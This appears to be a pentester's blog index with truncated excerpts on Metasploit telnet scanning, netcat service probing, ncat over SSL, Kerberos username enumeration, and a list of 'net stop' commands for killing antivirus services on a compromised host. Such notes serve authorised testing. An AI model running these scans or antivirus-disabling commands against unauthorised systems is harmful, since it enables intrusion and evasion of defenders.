Mentioned by hdm here and here, but I wanted to make a note of this myself. The first thing to do is set up the scan to look for vulnerable telnetd services:

    msf > use auxiliary/scanner/telnet/telnet_encrypt_overflow
    msf  auxiliary(telnet_encrypt_overflow) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf  auxiliary(telnet_encrypt_overflow) > set THREADS 64
    THREADS => 64

And now to run the scan:

    msf  auxiliary(telnet_encrypt_overflow) > run
    [*] 192.168.0.1:23 Does not support encryption: Netgear Embedded…

Ok, so on a job I found a service running on TCP port 5555 on a few servers. A little probing with netcat allowed me to identify the service (all of the output below is from my own testbed, hence the local 192.168.x.x IPs):

    root@bt:~# nc 192.168.0.18 5555
    break
    HP Data Protector A.06.11: INET, internal build 243, built on 25 August 2009, 13:08
    root@bt:~#

This version is flagged as vulnerable as…

A little brain issue prevented me from remembering how to connect to an HTTPS service on the command line. NetCat doesn't seem to work, it just hangs. Fortunately, after wasting some time I recalled how to do it in not one but 2 ways. Option 1: ncat (part of the nmap toolkit)

    root@bt:~# ncat --ssl www.phillips321.co.uk 443
    OPTIONS / HTTP/1.1
    Host:www.phillips321.co.uk

    HTTP/1.1 200 OK
    Date: Tue, 17 Jan 2012…

So you've got shell access to a remote box as SYSTEM and you want to upload some tools, but you keep getting halted by antivirus and the like.

Here's a quick list of services to kill:

    net stop "Ahnlab Task Scheduler"
    net stop "altiris client service"
    net stop ANTIVIR
    net stop ATRACK
    net stop "avast! antivirus"
    net stop "avast! iavs4 control service"
    net stop AVCONSOL
    net stop "AVG6 Service"
    net…

So we've all played with RID cycling and GetAcct.exe, but lately I guess we've not been pulling this out of our bag. Protection against this is now normal, so we need a new way to enumerate usernames against a given domain. New info on this website is pointing towards a tool called ebrute that will allow enumeration of Kerberos without having to take a password guess. On a decent machine…